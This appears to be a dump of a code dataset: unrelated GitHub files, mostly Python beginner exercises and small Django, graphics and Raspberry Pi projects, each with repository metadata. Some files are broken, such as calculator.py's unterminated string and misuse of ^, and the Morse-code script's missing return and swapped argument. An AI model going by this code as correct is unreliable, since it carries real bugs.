product = get_object_or_404(Product, pk=id)
total += quantity * product.price
item_count += quantity
cart_items.append({"id": id, "quantity": quantity, "product": product})
return {"cart_items": cart_items, "total": total, "item_count": item_count}
| [
"42890101+Walachul@users.noreply.github.com"
] | 42890101+Walachul@users.noreply.github.com |
1e5bef82c6328f42d541657e2b7873943f399850 | 5a5f58c3de67e6668f565c01071aab4ab301d43e | /function_multiple_arguments.py | ebc47cace9a71257419e8df6b72a99c81ea4b42f | [] | no_license | FabianTauriello/Problem-Solving-And-Programming-Textbook-Problems-Python- | bde9d59abca7307e0b413529e12736d13c817cee | 59a99131bd3addd5278c427d0c0d6a44508a1363 | refs/heads/master | 2021-09-07T00:29:06.672161 | 2018-02-14T07:11:52 | 2018-02-14T07:11:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | # This program demonstrates a function that accepts two arguments
def main():
print('The sum of 12 and 45 is')
show_sum(12,45)
# The show_sum functions accepts two arguments and
# displays their sum.
def show_sum(num1, num2):
result = num1 + num2
print(result)
# Call the main function
main()
| [
"noreply@github.com"
] | noreply@github.com |
c1a849a3ef968a12653876769b2c0efefab85133 | 8569b19a31f0b506ab6ded1da8f1e9b2c6a54238 | /moderate/urls.py | a43ea376faa64edd6fa1367c9ab69212016a329b | [
"MIT"
] | permissive | sandnima/blog-with-Django | 460a5a8bb78357cfcfab44d456f3e452ddaa443e | 77cb90f4e3aa70efa8d5190146f6acb4cd22d9a7 | refs/heads/main | 2023-06-24T20:45:25.346095 | 2021-07-27T14:26:05 | 2021-07-27T14:26:05 | 378,387,526 | 0 | 0 | MIT | 2021-07-12T19:17:16 | 2021-06-19T10:43:26 | JavaScript | UTF-8 | Python | false | false | 289 | py | from django.urls import path
from .views import (
moderate,
article_list
)
app_name = 'moderate'
urlpatterns = [
path('', moderate, name='index'),
path('blog/', article_list, name='article_list_index'),
path('blog/p-<int:page>/', article_list, name='article_list'),
]
| [
"46921550+sandnima@users.noreply.github.com"
] | 46921550+sandnima@users.noreply.github.com |
86c4579e69639f21cd77bf45cfc84b101d9ccfff | cf5b2850dc9794eb0fc11826da4fd3ea6c22e9b1 | /xlsxwriter/test/drawing/test_drawing_chart01.py | 5c7893a9c2c67067496a261dfe31cb992bb3ae86 | [
"BSD-2-Clause"
] | permissive | glasah/XlsxWriter | bcf74b43b9c114e45e1a3dd679b5ab49ee20a0ec | 1e8aaeb03000dc2f294ccb89b33806ac40dabc13 | refs/heads/main | 2023-09-05T03:03:53.857387 | 2021-11-01T07:35:46 | 2021-11-01T07:35:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,125 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...drawing import Drawing
class TestAssembleDrawing(unittest.TestCase):
"""
Test assembling a complete Drawing file.
"""
def test_assemble_xml_file(self):
"""Test writing a drawing with no cell data."""
self.maxDiff = None
fh = StringIO()
drawing = Drawing()
drawing._set_filehandle(fh)
dimensions = [4, 8, 457200, 104775, 12, 22, 152400, 180975, 0, 0]
drawing_object = drawing._add_drawing_object()
drawing_object['type'] = 1
drawing_object['dimensions'] = dimensions
drawing_object['width'] = 0
drawing_object['height'] = 0
drawing_object['description'] = None
drawing_object['shape'] = None
drawing_object['anchor'] = 1
drawing_object['rel_index'] = 1
drawing_object['url_rel_index'] = 0
drawing_object['tip'] = None
drawing.embedded = 1
drawing._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
<xdr:twoCellAnchor>
<xdr:from>
<xdr:col>4</xdr:col>
<xdr:colOff>457200</xdr:colOff>
<xdr:row>8</xdr:row>
<xdr:rowOff>104775</xdr:rowOff>
</xdr:from>
<xdr:to>
<xdr:col>12</xdr:col>
<xdr:colOff>152400</xdr:colOff>
<xdr:row>22</xdr:row>
<xdr:rowOff>180975</xdr:rowOff>
</xdr:to>
<xdr:graphicFrame macro="">
<xdr:nvGraphicFramePr>
<xdr:cNvPr id="2" name="Chart 1"/>
<xdr:cNvGraphicFramePr/>
</xdr:nvGraphicFramePr>
<xdr:xfrm>
<a:off x="0" y="0"/>
<a:ext cx="0" cy="0"/>
</xdr:xfrm>
<a:graphic>
<a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
<c:chart xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
</a:graphicData>
</a:graphic>
</xdr:graphicFrame>
<xdr:clientData/>
</xdr:twoCellAnchor>
</xdr:wsDr>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
4dfad2ec527357f9654b531f2f4558bcd9651f47 | 2179ae6ea7da99fd58c968281f9dcdb28684214c | /ZhangYiwuHomework05Sec01.py | 99027497422680542f8c329692e5cfa1e4bceb30 | [] | no_license | Wintus/MyPythonCodes | 86d5aad9fabae0f6ed58b63741e44135bfee903e | 316d20c39c2de5960b094611c092805895037df7 | refs/heads/master | 2023-08-31T21:07:27.630010 | 2023-08-21T18:00:33 | 2023-08-21T18:00:33 | 29,950,620 | 0 | 0 | null | 2023-08-21T18:00:01 | 2015-01-28T04:32:30 | Python | UTF-8 | Python | false | false | 3,876 | py | # Project: Throw dice(ZhangYiwuHomework05Sec01.py)
# Name: Yiwu Zhang
# Date: 06/03/14
# Description: This program will let user throw five dices
from graphics import *
from random import randint
def textbox(center, text, width, height, win):
#calculate the p1, p2 from the center, width, height
p1 = Point(center.getX() - width/2, center.getY() - height/2)
p2 = Point(center.getX() + width/2, center.getY() + height/2)
#make a retangle
box = Rectangle(p1, p2)
box.draw(win)
#make a text
text = Text(center, text)
text.draw(win)
return text, box
def dice(intNumber, center, intSize, win):
#build a dice object
#make a square(rectangle)
#calculate the p1, p2 from the center point and size
p1 = Point(center.getX() - intSize/2, center.getY() - intSize/2)
p2 = Point(center.getX() + intSize/2, center.getY() + intSize/2)
box = Rectangle(p1, p2)
box.draw(win)
box.setFill("white")
#draw five dots
intSpace = intSize / 4
intRadius = intSize / 10
for center in calcPoints(center, intSpace, intNumber):
dot(center, intRadius, win)
def calcPoints(center, intSpace, intNumber):
#calcPoints function
listPoints = []
if intNumber in range(1, 5 + 1):
listPoints.append(center.clone())
if intNumber in range(2, 6 + 1):
listPoints.append(Point(center.getX() - intSpace, \
center.getY() - intSpace))
listPoints.append(Point(center.getX() + intSpace, \
center.getY() + intSpace))
if intNumber in range(4, 6 + 1):
listPoints.append(Point(center.getX() + intSpace, \
center.getY() - intSpace))
listPoints.append(Point(center.getX() - intSpace, \
center.getY() + intSpace))
if intNumber == 6:
listPoints.append(Point(center.getX() - intSpace, center.getY()))
listPoints.append(Point(center.getX() + intSpace, center.getY()))
# return a list of dots
return listPoints
def dot(center, radius, win):
#creat a dot
dot0 = Circle(center, radius)
dot0.draw(win)
dot0.setFill("black")
def isClicked(rectangle, clicked):
p1 = rectangle.getP1()
p2 = rectangle.getP2()
withinX = p1.getX() < clicked.getX() < p2.getX()
withinY = p1.getY() < clicked.getY() < p2.getY()
#return Boolean
return withinX and withinY
def main():
# make a window
win = GraphWin("dice", 600, 300)
#5 coordinates for each boxes
point1 = Point(80, 150)
point2 = Point(190, 150)
point3 = Point(300,150)
point4 = Point(410, 150)
point5 = Point(520, 150)
points = (point1, point2, point3, point4, point5)
squares = list(range(5))
# make a exit button
exitButton = textbox(Point(540, 270), "EXIT", 80, 50, win) # (text, box)
# make a text
Text(Point(135, 250), "dice total").draw(win)
# show the total
intSum = 0
listSum = [0] * 5
textSum = Text(Point(135, 275), str(intSum))
textSum.draw(win)
# draw dices
for i in range(5):
p = points[i]
squares[i] = textbox(p, "Dice {}".format(i) , 90, 90, win)
## dice(randint(1, 6), p, 80, win)
# catch mouse clicks
while True:
clicked = win.getMouse()
if isClicked(exitButton[1], clicked):
win.close()
for i in range(5):
## for atextbox in squares:
box = squares[i][1]
if isClicked(box, clicked):
intRandom = randint(1, 6)
print(intRandom)
listSum[i] = intRandom
dice(intRandom, box.getCenter(), 80, win) # SEVERE BUG
print(intRandom)
## textSum.undraw()
intSum = sum(listSum)
textSum.setText(str(intSum))
main()
| [
"132e84e5@opayq.com"
] | 132e84e5@opayq.com |
2971c2d688f374cbce35fdd93a9da5acb61919cb | 148082a4062cfa40e72a7ff435b0b6c6adaf7241 | /economic_analysis/economic_analysis/search_and_visualization.py | 6de8e6a1c85b605aba37fb0c936230df849e09bc | [
"MIT"
] | permissive | Nazar4ick/Homework-research | ccf3cba45718de7e4c100284c4b5a75b691b3411 | 6fce361ab2ed2fab5e367eab47d4b4a3b435d5d1 | refs/heads/master | 2022-07-24T01:06:53.733976 | 2020-05-18T05:23:13 | 2020-05-18T05:23:13 | 250,268,189 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,947 | py | import countries_data
import matplotlib.pyplot as plt
from custom_array import Array
def get_countries():
"""
gets information about all researched countries
:return: tuple
"""
ukraine = countries_data.get_ukraine()
bulgaria = countries_data.get_bulgaria()
hungary = countries_data.get_hungary()
poland = countries_data.get_poland()
romania = countries_data.get_romania()
czech = countries_data.get_czech()
slovakia = countries_data.get_slovakia()
slovenia = countries_data.get_slovenia()
croatia = countries_data.get_croatia()
lithuania = countries_data.get_lithuania()
latvia = countries_data.get_latvia()
estonia = countries_data.get_estonia()
return \
ukraine, bulgaria, hungary, poland, \
romania, czech, slovakia, slovenia, \
croatia, lithuania, latvia, estonia
def launch_search_system(countries, country_names):
"""
launches the search system
:param countries: list
:param country_names: list
:return: None
"""
choice = 'yes'
while choice != 'no':
print(country_names)
name = input("What country you would like to investigate? ")
while name not in country_names:
name = input("What country you would like to investigate? ")
# find the desired country
for country in countries:
if country.name == name:
searched = country
# Move on to the info
max_year = 2018
commands = ('gdp', 'investment_inflows', 'investment_outflows',
'manufacturing')
print(commands)
command = input('What would you like to learn? ').lower()
while command not in commands:
command = input('What would you like to learn? ').lower()
# find the desired command
if command == 'gdp':
info = searched.gdp
elif command == 'investment_inflows':
info = searched.investment_inflows
elif command == 'investment_outflows':
info = searched.investment_outflows
# there is no data for outflows further than 2013
max_year = 2013
else:
info = searched.manufacturing
# Move on to the year
min_year = searched.min_indexes[command]
print(f'the minimal year is {min_year}, maximum: {max_year}')
year = 1
while not min_year <= year <= max_year:
year = input("What year's info are you looking for? ")
while True:
try:
year = int(year)
break
except ValueError:
year = input("What year's info are you looking for? ")
# display the info
if command == 'manufacturing' and min_year < 1995:
# fix an error with index error
year -= 2
print(info[year - min_year])
# give an opportunity to learn something more
choice = input('Would you like to learn something more? (yes/no) ')
while choice not in ('yes', 'no'):
choice = input('Would you like to learn something more? (yes/no) ')
def get_requested_countries(countries, country_names):
"""
gets requested countries for visualization and info
:param countries: list of all available countries for research
:param country_names: list
:return: (list, str)
"""
print(country_names)
# gather the requested information
chosen_names = []
requested_countries = []
name = ''
while name != 'next':
name = input('What countries would you like to investigate?'
' ("all" to add all, type "next" to proceed) ')
while name not in country_names and name != 'next' and name != 'all':
name = input('What countries would you like to investigate?'
' ("all" to add all, type "next" to proceed) ')
chosen_names.append(name)
# add chosen countries
for name in chosen_names:
for country in countries:
if name == country.name:
requested_countries.append(country)
elif name == 'all':
requested_countries = countries
break
# ask what info would the user like to learn
commands = ('gdp', 'investment_inflows', 'investment_outflows',
'manufacturing')
print(commands)
info = input('What would you like to visualize? ')
while info not in commands:
info = input('What would you like to visualize? ')
return requested_countries, info
def visualize(countries, country_names):
"""
visualizes requested information
:param countries: list of all available countries for research
:param country_names: list
:return: None
"""
countries_and_info = get_requested_countries(countries, country_names)
countries, info = countries_and_info[0], countries_and_info[1]
year_info = get_max_base_year(countries, info)
base_year = year_info[0]
all_years = year_info[1]
if info == 'gdp':
for country in countries:
slice_from = base_year - country.min_indexes[info]
plt.plot(all_years, country.gdp[slice_from:],
label=country.name)
elif info == 'investment_inflows':
for country in countries:
slice_from = base_year - country.min_indexes[info]
plt.plot(all_years, country.investment_inflows[slice_from:],
label=country.name)
elif info == 'investment_outflows':
for country in countries:
slice_from = base_year - country.min_indexes[info]
# not all countries have info for 2014th year
plt.plot(all_years,
country.investment_outflows[slice_from:2014 - base_year],
label=country.name)
elif info == 'manufacturing':
for country in countries:
slice_from = base_year - country.min_indexes[info]
# some countries have different start years, but have
# the same amount of data, which causes an Error
# Lithuania is an exception
if slice_from >= 4 and country.name not in ('Lithuania', 'Latvia'):
slice_from = 4
elif len(all_years) != len(country.manufacturing[slice_from:]):
all_years = all_years[len(all_years) -
len(country.manufacturing[slice_from:]):]
plt.plot(all_years, country.manufacturing[slice_from:],
label=country.name)
plt.legend()
plt.show()
def get_max_base_year(countries, info):
"""
gets the max base year, so that the graphics don't shift
and start from the same point
:param countries: lst
:param info: str
:return: int
"""
base_years = []
max_year = 2018
if info == 'investment_outflows':
max_year = 2013
for country in countries:
base_years.append(country.min_indexes[info])
base_year = max(base_years)
# create an array, so there is no conflict when plotting
all_years = Array(max_year + 1 - base_year)
# get all years for the x axis
for i in range(len(all_years)):
all_years[i] = base_year + i
return base_year, all_years
def main():
"""
Controls the search and visualization systems
:return: None
"""
intro = 'This program is designed to help you analyse ' \
'economics of Ukraine or any other\ncountry in ' \
'comparison to other countries with a similar model of economics'
warning = 'When visualizing, type all countries you would like ' \
'to visualize one by one and type "next"'
note = 'GDP is GDP per capita. Investment and manufacturing ' \
'count as percent of GDP'
print(intro)
print('WARNING')
print(warning)
print('NOTE')
print(note)
# get information about all countries in advance
countries = get_countries()
country_names = []
for country in countries:
country_names.append(country.name)
# get the user's choice
choice = ''
while choice != 'q':
choice = input('Would you like to search or visualize?'
' (s or v, q to quit) ')
while choice not in ('s', 'v') and choice != 'q':
choice = input('Would you like to search or visualize?'
' (s or v, q to quit) ')
# proceed to the choice
if choice == 's':
launch_search_system(countries, country_names)
elif choice == 'v':
visualize(countries, country_names)
main()
| [
"noreply@github.com"
] | noreply@github.com |
185916b8c6ed4dfc3a2880a20b9cdaf3fd075629 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/8/sV-.py | dbd279c3dd10a5a0e31f79253387b280f6d56b03 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'sV-':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
a818f026d27f1f4910ccaef03767ee79b55b13be | b4afd14e3b4e9cff0a99906a69587e348b243aeb | /website/《简明教程》/数据结构/ds_reference.py | ad8d28d89f29f5b7de173ab94ebdd97be12402cf | [] | no_license | zhankq/pythonlearn | d694df23826cda6ba662e852e531e96a10ab2092 | cb714fbb8257193029f958e73e0f9bd6a68d77f1 | refs/heads/master | 2021-12-16T13:51:23.381206 | 2021-12-03T01:13:36 | 2021-12-03T01:13:36 | 205,632,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 551 | py | print('Simple Assignment')
shoplist = ['apple', 'mango', 'carrot', 'banana']
# mylist 只是指向同一对象的另一种名称
mylist = shoplist
# 我购买了第一项项目,所以我将其从列表中删除
del shoplist[0]
print('shoplist is', shoplist)
print('mylist is', mylist)
print('Copy by making a full slice')
# 通过生成一份完整的切片制作一份列表的副本
mylist = shoplist[:]
# 删除第一个项目
del mylist[0]
print('shoplist is', shoplist)
print('mylist is', mylist)
# 注意到现在两份列表已出现不同
| [
"zhankq@163.com"
] | zhankq@163.com |
a754b722541480ba073c1e0b7bb44a477bd042d7 | d74bb5500cf01c740c21b6764604d5355c6b2116 | /calculator.py | f4ae76f1064ed58f661b25159d16017790a9b9ef | [] | no_license | aarmlovich/assignments | 5d1a875703790662aa7852cb18375ea101f666d1 | 0141cedb7986dec8f2834893414d86be512ab483 | refs/heads/master | 2021-10-11T04:21:21.708724 | 2019-01-21T23:38:27 | 2019-01-21T23:38:27 | 164,486,400 | 0 | 0 | null | 2019-01-09T02:10:32 | 2019-01-07T20:01:04 | Python | UTF-8 | Python | false | false | 260 | py | def multiply(a,b):
return a * b
def add(a,b):
return a + b
def subtract(a,b):
return a - b
def divide(a,b):
return a / b
def square(a,b):
return (b ^ 2)
print("I'm going use the calculator functions to square (5+6)
x = (6^2)
print(x) | [
"aarmlovi@gmail.com"
] | aarmlovi@gmail.com |
cda2926915916edda8332981140a91b32000fea7 | e5e56b7309abd035ef9e33354392cbf8afbd8162 | /humidity-webthing.py | b0e2a6ce59d8df18eb0b48a266c6b4efdc62cc87 | [
"Apache-2.0"
] | permissive | ricklon/sensehat-webthing | 8b703c29d22693933f5d7bd9f8b27b3d1c20adf5 | f2f4982538cfbcae325b7b7603d95bc2ece56182 | refs/heads/master | 2020-04-07T06:29:17.978882 | 2018-12-02T21:17:48 | 2018-12-02T21:17:48 | 158,137,491 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,723 | py |
# Examples based on : https://www.raspberrypi.org/magpi/sense-hat-science-humidity/
import logging
from sense_hat import SenseHat
from datetime import datetime
from time import sleep
# Webthing imports
from asyncio import sleep, CancelledError, get_event_loop
from webthing import (Action, Event, MultipleThings, Property, Thing, Value,
WebThingServer)
import random
import uuid
# Set up log file
logfile = "humidity-"+str(datetime.now().strftime("%Y%m%d-%H%M"))+".csv"
# Configure log settings and format for CSV
logging.basicConfig(filename=logfile, level=logging.DEBUG,
format='%(asctime)s %(message)s',
datefmt='%Y-%m-%d, %H:%M:%S,')
# Configure sense hat
sh = SenseHat()
prev_h = 0
class HumiditySensor(Thing):
""" Humidity Sensor using the SenseHat """
def __init__(self):
Thing.__init__(self,
'Sensehat Humidity Sensor',
['MultiLevelSensor'],
'A web connected humidity sensor')
self.level = Value(0.0)
self.add_property(
Property(self,
'level',
self.level,
metadata={
'@type': 'LevelProperty',
'label': 'HUmidity',
'type': 'float',
'description': 'The current humidity in %',
'minimum': 0,
'maximum': 100,
'unit': 'percent',
'readonly': True,
}))
logging.debug('Starting the sensor update loop')
self.sensor_update_task = get_event_loop().create_task(self.update_level())
async def update_level(self):
try:
while True:
await sleep(3)
new_level = sh.get_humidity()
logging.info(str(new_level))
self.level.notify_of_external_update(new_level)
except CancelledError:
# No clean up needed
pass
def cancel_update_level_task(self):
self.sensor_update_task.cancel()
get_event_loop().run_until_complete(self.sensor_update_task)
def run_server():
SensorHumidity = HumiditySensor()
server = WebThingServer(MultipleThings([SensorHumidity],'Humidity Device'),port=9999)
try:
logging.info('starting the sever')
server.start()
except KeyboardInterrupt:
logging.debug('canceling sesor update looping task')
SensorHumidity.cancel_update_level_task()
logging.info('stopping the server')
server.stop()
logging.info('done')
if __name__=='__main__':
run_server()
| [
"ricklon@fubarlabs.org"
] | ricklon@fubarlabs.org |
3e608ec9b1ecd2351434412bbe5356d49a6d3136 | 3f3dc90fd47b5ce490b42b6fd9f73663fcd70075 | /311Complaints.py | 23bd83b0bd5417276feaedbcabff307328544c30 | [] | no_license | catherine8224/Favorite-Neighborhood | 20cf2108007af30216a847d6016555a71430016e | c842c0a59c9a708dd7dede7decd0dc4ba1d8b9cb | refs/heads/master | 2020-04-14T03:56:21.985856 | 2019-01-07T07:15:35 | 2019-01-07T07:15:35 | 163,620,942 | 0 | 0 | null | 2019-01-07T07:15:36 | 2018-12-30T22:09:47 | null | UTF-8 | Python | false | false | 627 | py | import pandas as pd
import matplotlib.pyplot as plt
df = pd.read_csv("311_Service_Requests_from_2010_to_Present.csv")
##Count = df.groupby(['Complaint Type']).size().reset_index(name='counts')
##poop = Count.sort_values('counts', ascending=False)
##print(poop.head(10))
##df = df.groupby(['Complaint Type']).size().rename(columns={'Complaint Type': 'count'})
###df = df.sort_values('count', ascending=False)
##print(df)
top311 = df['Complaint Type'].value_counts()[:10]
print("The 10 most pressing complaints to the 311 in my neighborhood last year:")
print(top311)
agency = df['Agency Name'].value_counts()
print(agency)
| [
"noreply@github.com"
] | noreply@github.com |
5bbd81b6220271c40f2bc0df4af86e81a6f67d38 | a8fa49c3a6c6d6a66a89089fdd013343f48b436e | /count.py | c58715b8be547e0c27acc75056cc92fa42edd5b9 | [] | no_license | avi527/Tuple | 007ec5b6e832c8fd94a418e7e28001d1d3347553 | 1fa58417a5a86bc541ae62bdcdacddc7f6592e1f | refs/heads/master | 2020-07-08T09:17:53.483953 | 2019-08-21T17:18:53 | 2019-08-21T17:18:53 | 203,630,240 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | # NOTE :- the count() method is used to return the number of elements with
#a specific value in a tuple
#programm to count the number of times letter 'x' appears in specified string
tub='asasasnbcsdjbhjhfaaaaaaabjsdbfdhvfdjhb'
print(tub.count('a'))
| [
"noreply@github.com"
] | noreply@github.com |
13b256f12a36c944c31f5fb6828c2695c5e48be0 | 3e7bd09504377e6c0b1079b5906173141d72169e | /morseCodeSend.py | 26b35672c980070cc52428676a252c038b9bf379 | [] | no_license | anniekroo/MorseCode | 7967eba8622a918b6813811557b0979a432d06a7 | b654387a0dbd35026dbf205d7b545ffa29dc7d80 | refs/heads/master | 2021-04-30T05:08:54.917134 | 2018-02-13T17:31:29 | 2018-02-13T17:31:29 | 121,409,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,984 | py | # Sending morse code signals through LED connected to the Raspi
# timing - start off with a variable time, change length of time for bit
# spacing -
# set it high for two bits and low for two bits (each ltter is 1 bit)
# one bit between letters and two bits between words
import time;
import RPi.GPIO as GPIO
t = 0.5; # seconds, time between symbols is 1 bit time, between letter is 3 bit time, figure out how long it takes
max_length = 20;
msg = "PRAVA SOS"
MORSECODE = {"A": ".-", "B": "-...", "C": "-.-.",
"D": "-..", "E": ".", "F": "..-.",
"G": "--.", "H": "....", "I": "..",
"J": ".---", "K": "-.-", "L": ".-..",
"M": "--", "N": "-.", "O": "---",
"P": ".--.", "Q": "--.-", "R": ".-.",
"S": "...", "T": "-", "U": "..-",
"V": "...-", "W": ".--", "X": "-..-",
"Y": "-.--", "Z": "--..",
}
class Safeguards:
def __enter__(self):
return self
def __exit__(self, *rabc):
GPIO.cleanup()
print("Safe exit succeeded")
return not any(rabc)
def prepare_pin(pin = 17):
GPIO.setmode(GPIO.BCM)
GPIO.setup(pin, GPIO.OUT)
def turn_high(pin):
GPIO.output(pin, GPIO.HIGH)
def turn_low(pin):
GPIO.output(pin, GPIO.LOW)
def encode_morse(word):
morseword = ""
for char in word:
if char == " ":
morseword = morseword + " "
else:
morseword = morseword + MORSECODE[char.upper()]
def delay(duration):
time.sleep(duration)
def blink(pin = 17, duration = 1):
prepare_pin(pin)
for i in range(2):
turn_high(pin)
delay(duration)
for i in range(2):
turn_low(pin)
delay(duration)
for i in range(max_length):
encodedmsg = encode_morse(msg)
for char in encodedmsg:
if char == " ":
for i in range(2):
turn_low(pin)
delay(duration)
if char == ".":
turn_high(pin)
delay(0.5*duration)
if char == "-":
turn_high(duration)
delay(duration)
if __name__ == "__main__":
with Safeguards():
blink();
| [
"annie.kroo@students.olin.edu"
] | annie.kroo@students.olin.edu |
1eed8b4f1c1aa85ee340a170e3c60fd72bdac31e | bf0c02385a9ef689bf97b258c0535e5a0fe4d279 | /pollsplus/forms.py | 9f014ace86ff4be2a35620dc726d98e4459dbb2d | [] | no_license | cometj03/PollsPlus | df9b9ef5905dd2827ed711133cd7edbb5ace619d | d1e6a17f469cd777b0fc74c22410cd22cad220d5 | refs/heads/master | 2023-02-05T08:18:21.339767 | 2020-12-22T10:44:31 | 2020-12-22T10:44:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | from django import forms
from .models import Post
class PostForm(forms.ModelForm):
class Meta:
model = Post
fields = ('title_text', 'file')
def __init__(self, *args, **kwargs):
super(PostForm, self).__init__(*args, **kwargs)
self.fields['file'].required = True | [
"tae.gun7784@gmail.com"
] | tae.gun7784@gmail.com |
f7c8f1c12a5b644fe553ebfdbf5c391252a507cd | 1f4852225cec8d9f954190bb36a2a5d586b3e8bd | /ITBooks/con/config.py | 9e37f40a5cefca8a3dae60173977ac91a5116492 | [] | no_license | crono/ITBooks | d8924d54e474b035a2cc54f69cf4f67a5004344a | 61648d3ab71a06f9754ebdc75e37d6d84d100605 | refs/heads/master | 2020-06-05T00:46:34.725762 | 2017-05-22T14:09:45 | 2017-05-22T14:09:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Add ITBooks to path
sys.path.append(os.path.dirname(BASE_DIR))
# DATABASE
DATABASE_DIR = os.path.join(BASE_DIR, 'database')
SQLITE_FILE = os.path.join(os.path.join(DATABASE_DIR, 'sqlite'), 'books.db')
# The value is the equal of spider's name
SEARCH_CONFIG = {'allitebooks': {'table': ''}, 'blah': {'table': ''}}
| [
"xiaozizayang@gmail.com"
] | xiaozizayang@gmail.com |
c526e5c1ee94d653828fe70c9d5a9315d84ce0bc | 2017c95fef02dd69705056640f08bcd34b0a4ce7 | /01b_no_numbers.py | 217bf6911c76fc645a7cc847739668acf90bb58c | [] | no_license | willoughbys70590/01-recipes | 90e73e411d766002d61021fd701cd820596a0853 | 6d90e6c9ac504655564f6d0b8dcc253b2cb29f12 | refs/heads/master | 2021-01-01T23:35:11.770247 | 2020-04-26T23:17:26 | 2020-04-26T23:17:26 | 239,393,226 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 430 | py | # Iterates through string...
# ask user for string
recipe_stacy = input("what is the recipe name? ")
error = "Your recipe name has numbers in it."
has_error ="yes"
# look at each character in string and if its a number, complain
for letter in recipe_stacy:
if letter.isdigit() == True:
print(error)
has_errors = "yes"
break
# give user feedback...
if has_error != "yes":
print("you are OK") | [
"60673309+willoughbys70590@users.noreply.github.com"
] | 60673309+willoughbys70590@users.noreply.github.com |
f802fd58fcee700b831bdb8136bc7f82023758d1 | a9b322a0d941825df73a71ad3de605978c9e778d | /virtual/bin/mailmail | 87be1a4b9000543ec5890a1ddb7f1d4876036be7 | [] | no_license | Elianehbmna/chaty-final | 172562d9d7399dc9230cc434d3c29be66a70f094 | 0b459168414da09566ea5b079a922dc1fa8694d0 | refs/heads/master | 2022-12-15T15:03:31.584467 | 2019-12-05T15:29:26 | 2019-12-05T15:29:26 | 223,245,043 | 0 | 0 | null | 2022-12-08T06:55:21 | 2019-11-21T19:07:55 | Python | UTF-8 | Python | false | false | 256 | #!/home/wecode/Documents/chat/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from twisted.mail.scripts.mailmail import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"elianehabimana3@gmail.com"
] | elianehabimana3@gmail.com | |
eb8bab4bad28dff6d31089e6d40eec757a60bac4 | d376c005d3b7cc73065a60bf62db0766e5da78ec | /URI_1060.py | c34900effd2e2f89e63d0647c43235da6fc705f6 | [] | no_license | Dairo01001/python_URI | 5355c6a47c90ae94727b16a0848ff6bc24f746b6 | d5f3fbb35e1528a8418859bb2aa3266fe872fe5d | refs/heads/main | 2023-09-04T10:35:35.058988 | 2021-11-05T00:28:30 | 2021-11-05T00:28:30 | 413,130,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 204 | py | def main():
cont: int = 0
for i in range(6):
aux = input()
cont = cont + 1 if aux[0] != '-' else cont
print(cont, 'valores positivos')
if __name__ == '__main__':
main()
| [
"garcianaranjodairo@gmail.com"
] | garcianaranjodairo@gmail.com |
d2c912ca3b797afbea61156ca9868b86bf8e7456 | 9605946780bd7294a216b9fc740eed1c5cc942eb | /bo-analyser.py | 6207c3854e6b3a59612be2cd153d59c4f7bf986e | [] | no_license | Oleaeuropaea/Static-Analysis-Vulnerability | b910cfdcf574ac3e592925c8c850ef1eb80f6bdc | eef8d9108a6310905e6b2aad958e7ddced50efc6 | refs/heads/master | 2020-07-07T18:00:56.324119 | 2019-08-20T18:44:29 | 2019-08-20T18:44:29 | 203,431,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | #!/usr/bin/python3
import sys
import json
from processor import Processor
class ClassEncoder(json.JSONEncoder):
def default(self, obj):
return obj.__dict__
def main(argv):
filename = argv[1]
if not filename.endswith('.json'):
print('python ./bo-analyser <program>.json')
print('./bo-analyser <program>.json')
sys.exit(2)
with open(filename) as input:
content = input.read()
code = json.loads(content)
proc = Processor(code)
res = proc.run()
filename = filename.replace('.json', '.output.json')
stringRes = json.dumps(res, indent=4, cls=ClassEncoder)
with open(filename, 'w') as output:
output.write(stringRes)
print('Finished!')
if __name__ == '__main__':
main(sys.argv) | [
"noreply@github.com"
] | noreply@github.com |
